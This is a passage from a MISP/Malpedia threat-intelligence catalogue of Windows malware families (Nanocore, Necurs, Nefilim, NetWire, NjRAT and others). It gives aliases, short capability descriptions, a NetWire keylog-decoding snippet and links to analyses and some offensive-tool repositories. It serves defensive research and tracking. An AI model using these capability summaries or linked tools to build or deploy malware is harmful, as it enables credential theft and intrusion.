http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html

http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware

https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector

Nabucur

The tag is: misp-galaxy:malpedia="Nabucur"

Nabucur is also known as:

Table 4093. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur

Nagini

The tag is: misp-galaxy:malpedia="Nagini"

Nagini is also known as:

Table 4095. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini

http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/

Nanocore RAT

Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.

The tag is: misp-galaxy:malpedia="Nanocore RAT"

Nanocore RAT is also known as:

  • Nancrat

  • NanoCore

Table 4097. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

https://www.secureworks.com/research/darktortilla-malware-analysis

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore

https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/

https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://assets.virustotal.com/reports/2021trends.pdf

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread

https://community.riskiq.com/article/24759ad2

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://blog.morphisec.com/syk-crypter-discord

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/

https://goggleheadedhacker.com/blog/post/11

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://www.ic3.gov/media/news/2020/200917-1.pdf

https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html

https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://community.riskiq.com/article/ade260c6

https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

https://malwareindepth.com/defeating-nanocore-and-cypherit/

https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages

https://intel471.com/blog/privateloader-malware

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332

NanoLocker

The tag is: misp-galaxy:malpedia="NanoLocker"

NanoLocker is also known as:

Table 4098. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker

Necurs

The tag is: misp-galaxy:malpedia="Necurs"

Necurs is also known as:

  • nucurs

Table 4105. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs

https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf

https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/

https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/

https://www.secureworks.com/research/threat-profiles/gold-riverview

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/

https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf

https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/

http://www.secureworks.com/research/threat-profiles/gold-riverview

https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors

https://www.bitsight.com/blog/joint-effort-with-microsoft-to-takedown-massive-criminal-botnet-necurs

http://blog.talosintelligence.com/2017/03/necurs-diversifies.html

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/

https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/

https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features

https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/

https://bin.re/blog/the-dgas-of-necurs/

https://intel471.com/blog/a-brief-history-of-ta505

NedDnLoader

NedDnLoader is an HTTP(S) downloader that uses AES for C&C trafic encryption.

It sends detailed information about the victim’s environment, like computer name, user name, type and free disk space of all drives, and a list of currently running processes. It uses three typical parameter names for HTTP POST requests: ned, gl, hl. The usual payload downloaded with NedDnLoader is Torisma.

The internal DLL name of NedDnLoader is usually Dn.dll, Dn64.dll or DnDll.dll. It is deployed either as a standalone payload or within a trojanized MFC application project. It contains specific RTTI symbols like ".?AVCWininet_Protocol@@" or ".?AVCMFC_DLLApp@@".

The tag is: misp-galaxy:malpedia="NedDnLoader"

NedDnLoader is also known as:

Table 4106. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.telsy.com/lazarus-gate/

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.

The tag is: misp-galaxy:malpedia="Nefilim"

Nefilim is also known as:

  • Nephilim

Table 4107. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim

https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html

https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/

https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html

https://securelist.com/evolution-of-jsworm-ransomware/102428/

https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf

https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware

http://www.secureworks.com/research/threat-profiles/gold-mansard

https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry

https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/

https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html

https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Nemty

Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artfifacts they had seen before in Gandcrab.

The tag is: misp-galaxy:malpedia="Nemty"

Nemty is also known as:

Table 4110. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty

https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/

https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md

https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html

https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/

https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://securelist.com/evolution-of-jsworm-ransomware/102428/

https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/

https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

http://www.secureworks.com/research/threat-profiles/gold-mansard

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw

https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/

https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/

https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/

Nerbian RAT

Proofpoint observed distribution of this RAT since late April 2022, it is written on Go and incorporates code from various open-source Git repositories.

The tag is: misp-galaxy:malpedia="Nerbian RAT"

Nerbian RAT is also known as:

Table 4111. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nerbian_rat

https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques

neshta

Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."

The tag is: misp-galaxy:malpedia="neshta"

neshta is also known as:

Table 4112. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta

https://www.virusradar.com/en/Win32_Neshta.A/description

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest

https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html

NESTEGG

NESTEGG is a memory-only backdoor that can proxy commands to other infected systems using a custom routing scheme. It accepts commands to upload and download files, list and delete files, list and terminate processes, and start processes. NESTEGG also creates Windows Firewall rules that allows the backdoor to bind to a specified port number to allow for inbound traffic.

The tag is: misp-galaxy:malpedia="NESTEGG"

NESTEGG is also known as:

Table 4113. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg

https://youtu.be/8hJyLkLHH8Q?t=1208

https://securelist.com/lazarus-under-the-hood/77908/

https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf

https://youtu.be/_kzFNQySEMw?t=789

https://content.fireeye.com/apt/rpt-apt38

NetDooka

A RAT written in .NET, delivered with a driver to protect it from deletion. Observed being dropped by PrivateLoader.

The tag is: misp-galaxy:malpedia="NetDooka"

NetDooka is also known as:

Table 4115. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netdooka

https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html

NetFlash

The tag is: misp-galaxy:malpedia="NetFlash"

NetFlash is also known as:

Table 4118. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netflash

https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/

NetKey

The tag is: misp-galaxy:malpedia="NetKey"

NetKey is also known as:

Table 4119. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey

https://twitter.com/kevinperlow/status/1156406115472760835

NetSpy

Freely available network reconnaissance tool.

The tag is: misp-galaxy:malpedia="NetSpy"

NetSpy is also known as:

Table 4121. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy

https://github.com/shmilylty/netspy

NetSupportManager RAT

Enigma Software notes that NetSupport Manager is a genuine application, which was first released about twenty years ago. The purpose of the NetSupport Manager tool is to enable users to receive remote technical support or provide remote computer assistance. However, cyber crooks have hijacked this useful application and misappropriated it to use it in their harmful campaigns. The name of the modified version of the NetSupport Manager has been labeled the NetSupport Manager RAT.

The tag is: misp-galaxy:malpedia="NetSupportManager RAT"

NetSupportManager RAT is also known as:

  • NetSupport

Table 4122. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat

https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html

https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising

https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/

https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/

https://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

https://asec.ahnlab.com/en/45312/

https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html

https://medium.com/walmartglobaltech/smartapesg-4605157a5b80

https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer

http://www.netsupportmanager.com/index.asp

https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html

NetWire RC

Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.

Keylog files are stored on the infected machine in an obfuscated form. The algorithm is:

for i in range(0,num_read):
    buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF

The tag is: misp-galaxy:malpedia="NetWire RC"

NetWire RC is also known as:

  • NetWeird

  • NetWire

  • Recam

Table 4124. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA

https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf

https://lmntrix.com/lab/analysis-of-netwire-rat/

https://threatpost.com/ta2541-apt-rats-aviation/178422/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/

https://community.riskiq.com/article/24759ad2

https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data

https://www.theregister.com/2023/03/10/fbi_netwire_seizure/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/

https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/

https://news.drweb.ru/show/?i=13281&c=23

https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line

https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view

https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg

https://www.youtube.com/watch?v=TeQdZxP0RYY

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view

https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html

https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://news.sophos.com/en-us/2020/05/14/raticate/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html

https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728

https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers

https://www.circl.lu/pub/tr-23/

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/

https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

Neutrino POS

The tag is: misp-galaxy:malpedia="Neutrino POS"

Neutrino POS is also known as:

Table 4127. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos

https://securelist.com/neutrino-modification-for-pos-terminals/78839/

Nexster Bot

The tag is: misp-galaxy:malpedia="Nexster Bot"

Nexster Bot is also known as:

Table 4134. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot

https://twitter.com/benkow_/status/789006720668405760

NGLite

According to Unit42, NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.

The tag is: misp-galaxy:malpedia="NGLite"

NGLite is also known as:

Table 4137. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nglite

https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/

https://us-cert.cisa.gov/ncas/alerts/aa21-336a

Nibiru

The tag is: misp-galaxy:malpedia="Nibiru"

Nibiru is also known as:

Table 4138. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nibiru

https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html

NimbleMamba

NimbleMamba is a new implant used by TA402/Molerats group as replacement of LastConn. It uses guardrails to ensure that victims are within the TA’s target region. It is written in C# and delivered as an obfuscated .NET executable. One seen obfuscator is SmartAssembly.

The tag is: misp-galaxy:malpedia="NimbleMamba "

NimbleMamba is also known as:

Table 4142. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimblemamba

https://thehackernews.com/2022/02/palestinian-hackers-using-new.html

https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage

Nimbo-C2 (Windows)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It’s written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

The tag is: misp-galaxy:malpedia="Nimbo-C2 (Windows)"

Nimbo-C2 (Windows) is also known as:

Table 4143. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2

https://github.com/itaymigdal/Nimbo-C2

NimGrabber

Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.

The tag is: misp-galaxy:malpedia="NimGrabber"

NimGrabber is also known as:

Table 4144. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

Nimplant

Part of Mythic C2, written in Nim. Considered deprecated, as it is only compatible with Mythic 2.1.

The tag is: misp-galaxy:malpedia="Nimplant"

Nimplant is also known as:

Table 4145. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant

https://github.com/MythicAgents/nimplant

Nimrev

Backdoor written in Nim.

The tag is: misp-galaxy:malpedia="Nimrev"

Nimrev is also known as:

Table 4146. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

NimBlackout

According to its author, NimBlackout is an adaptation of the @Blackout project originally developed in C++ by @ZeroMemoryEx, which consists of removing AV/EDRs using the gmer (BYOVD) driver. The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.

The tag is: misp-galaxy:malpedia="NimBlackout"

NimBlackout is also known as:

Table 4147. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout

https://github.com/Helixo32/NimBlackout

NineRAT

The tag is: misp-galaxy:malpedia="NineRAT"

NineRAT is also known as:

Table 4148. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ninerat

https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

NirCmd

NirCmd is a benign tool by NirSoft that provides various functionalities. Among these is e.g. a capability to start regedit as SYSTEM, which is sometimes abused for privilege escalation, or other functionality abusable for other malicious purposes. It is also frequently flagged by AV engines.

The tag is: misp-galaxy:malpedia="NirCmd"

NirCmd is also known as:

Table 4149. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nircmd

https://www.nirsoft.net/utils/nircmd.html

nitlove

The tag is: misp-galaxy:malpedia="nitlove"

nitlove is also known as:

Table 4150. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove

https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html

NixScare Stealer

The tag is: misp-galaxy:malpedia="NixScare Stealer"

NixScare Stealer is also known as:

Table 4154. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nixscare

https://twitter.com/3xp0rtblog/status/1302584919592501248

NjRAT

RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim’s camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim’s desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."

It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.

The tag is: misp-galaxy:malpedia="NjRAT"

NjRAT is also known as:

  • Bladabindi

  • Lime-Worm

Table 4155. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://attack.mitre.org/groups/G0096

